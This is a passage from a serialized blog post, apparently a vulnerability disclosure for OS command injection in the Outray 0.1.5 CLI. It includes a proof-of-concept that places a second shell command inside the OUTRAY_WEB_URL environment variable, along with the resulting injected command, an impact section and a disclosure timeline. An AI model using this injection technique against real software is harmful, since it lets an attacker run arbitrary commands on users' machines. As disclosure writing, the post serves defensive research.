OUTRAY_WEB_URL",{"type":19,"tag":118,"props":1291,"children":1292},{"style":137},[1293],{"type":25,"value":164},{"type":19,"tag":118,"props":1295,"children":1296},{"style":204},[1297],{"type":25,"value":439},{"type":19,"tag":118,"props":1299,"children":1300},{"style":210},[1301],{"type":25,"value":1302},"http://127.0.0.1:3001",{"type":19,"tag":118,"props":1304,"children":1305},{"style":204},[1306],{"type":25,"value":218},{"type":19,"tag":118,"props":1308,"children":1309},{"class":120,"line":148},[1310,1315],{"type":19,"tag":118,"props":1311,"children":1312},{"style":125},[1313],{"type":25,"value":1314},"outray",{"type":19,"tag":118,"props":1316,"children":1317},{"style":210},[1318],{"type":25,"value":1319}," login\n",{"type":19,"tag":67,"props":1321,"children":1322},{},[1323],{"type":25,"value":1324},"Resulting command after injection would be (on linux):",{"type":19,"tag":108,"props":1326,"children":1328},{"className":1270,"code":1327,"language":1272,"meta":7,"style":7},"xdg-open \"https://outray2shell.lol\";echo $(whoami)>/tmp/outray-pwned\"\"\n",[1329],{"type":19,"tag":93,"props":1330,"children":1331},{"__ignoreMap":7},[1332],{"type":19,"tag":118,"props":1333,"children":1334},{"class":120,"line":121},[1335,1340,1344,1348,1352,1357,1362,1367,1372,1377,1382,1387],{"type":19,"tag":118,"props":1336,"children":1337},{"style":125},[1338],{"type":25,"value":1339},"xdg-open",{"type":19,"tag":118,"props":1341,"children":1342},{"style":204},[1343],{"type":25,"value":207},{"type":19,"tag":118,"props":1345,"children":1346},{"style":210},[1347],{"type":25,"value":557},{"type":19,"tag":118,"props":1349,"children":1350},{"style":204},[1351],{"type":25,"value":439},{"type":19,"tag":118,"props":1353,"children":1354},{"style":131},[1355],{"type":25,"value":1356},";",{"type":19,"tag":118,"props":1358,"children":1359},{"style":536},[1360],{"type":25,"value":1361},"echo",{"type":19,"tag":118,"props":1363,"children":1364},{"style":210},[1365],{"type":25,"value":1366}," $(",{"type":19,"tag":118,"props":1368,"children":1369},{"style":125},[1370],{"type":25,"value":1371},"whoami",{"type":19,"tag":118,"props":1373,"children":1374},{"style":210},[1375],{"type":25,"value":1376},")",{"type":19,"tag":118,"props":1378,"children":1379},{"style":137},[1380],{"type":25,"value":1381},">",{"type":19,"tag":118,"props":1383,"children":1384},{"style":210},[1385],{"type":25,"value":1386},"/tmp/outray-pwned",{"type":19,"tag":118,"props":1388,"children":1389},{"style":204},[1390],{"type":25,"value":1391},"\"\"\n",{"type":19,"tag":67,"props":1393,"children":1394},{},[1395,1397,1401,1403,1407],{"type":25,"value":1396},"The output of ",{"type":19,"tag":93,"props":1398,"children":1399},{"className":7},[1400],{"type":25,"value":1371},{"type":25,"value":1402}," is successfully written to ",{"type":19,"tag":93,"props":1404,"children":1405},{"className":7},[1406],{"type":25,"value":1386},{"type":25,"value":1408},", confirming arbitrary code execution.",{"type":19,"tag":67,"props":1410,"children":1411},{},[1412],{"type":19,"tag":1413,"props":1414,"children":1417},"img",{"alt":1415,"src":1416},"poc-demostration","/blogs-img/outray-inject.png",[],{"type":19,"tag":20,"props":1419,"children":1421},{"id":1420},"impact",[1422],{"type":25,"value":1423},"Impact",{"type":19,"tag":1425,"props":1426,"children":1427},"ul",{},[1428,1439],{"type":19,"tag":1429,"props":1430,"children":1431},"li",{},[1432,1437],{"type":19,"tag":82,"props":1433,"children":1434},{},[1435],{"type":25,"value":1436},"Remote Code Execution",{"type":25,"value":1438},": Attackers can execute arbitrary commands with the privileges of the user running the CLI. This can lead to full system compromise, data exfiltration, or persistence installation.",{"type":19,"tag":1429,"props":1440,"children":1441},{},[1442,1447],{"type":19,"tag":82,"props":1443,"children":1444},{},[1445],{"type":25,"value":1446},"Supply Chain Attack",{"type":25,"value":1448},": If this CLI is used in CI/CD pipelines or automated scripts where environment variables might be manipulated, it could serve as an entry point for supply chain attacks.",{"type":19,"tag":48,"props":1450,"children":1452},{"id":1451},"timeline",[1453],{"type":25,"value":1454},"Timeline",{"type":19,"tag":1425,"props":1456,"children":1457},{},[1458,1468,1478,1487],{"type":19,"tag":1429,"props":1459,"children":1460},{},[1461,1466],{"type":19,"tag":82,"props":1462,"children":1463},{},[1464],{"type":25,"value":1465},"12/1/2026",{"type":25,"value":1467}," - Submitted to maintainer via github advisory",{"type":19,"tag":1429,"props":1469,"children":1470},{},[1471,1476],{"type":19,"tag":82,"props":1472,"children":1473},{},[1474],{"type":25,"value":1475},"14/1/2026",{"type":25,"value":1477}," - Maintainer closed advisory",{"type":19,"tag":1429,"props":1479,"children":1480},{},[1481,1485],{"type":19,"tag":82,"props":1482,"children":1483},{},[1484],{"type":25,"value":1475},{"type":25,"value":1486}," - Submitted to VulDB for review",{"type":19,"tag":1429,"props":1488,"children":1489},{},[1490,1495],{"type":19,"tag":82,"props":1491,"children":1492},{},[1493],{"type":25,"value":1494},"17/1/2026",{"type":25,"value":1496}," - Submission Rejected, suggested submission to Mitre",{"type":19,"tag":1498,"props":1499,"children":1500},"style",{},[1501],{"type":25,"value":1502},"html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}",{"title":7,"searchDepth":148,"depth":148,"links":1504},[1505,1512],{"id":22,"depth":148,"text":8,"children":1506},[1507,1509,1510,1511],{"id":50,"depth":172,"text":1508},"Source code: (github link)",{"id":62,"depth":172,"text":65},{"id":74,"depth":172,"text":77},{"id":494,"depth":172,"text":497},{"id":1420,"depth":148,"text":1423,"children":1513},[1514],{"id":1451,"depth":172,"text":1454},"markdown","content:blogs:Outray_0.1.5_os_command_injection.md","content","blogs/Outray_0.1.5_os_command_injection.md","md",{"loc":4,"lastmod":1521,"images":1522},"2026-04-29T18:26:59.364Z",[],1777487261905]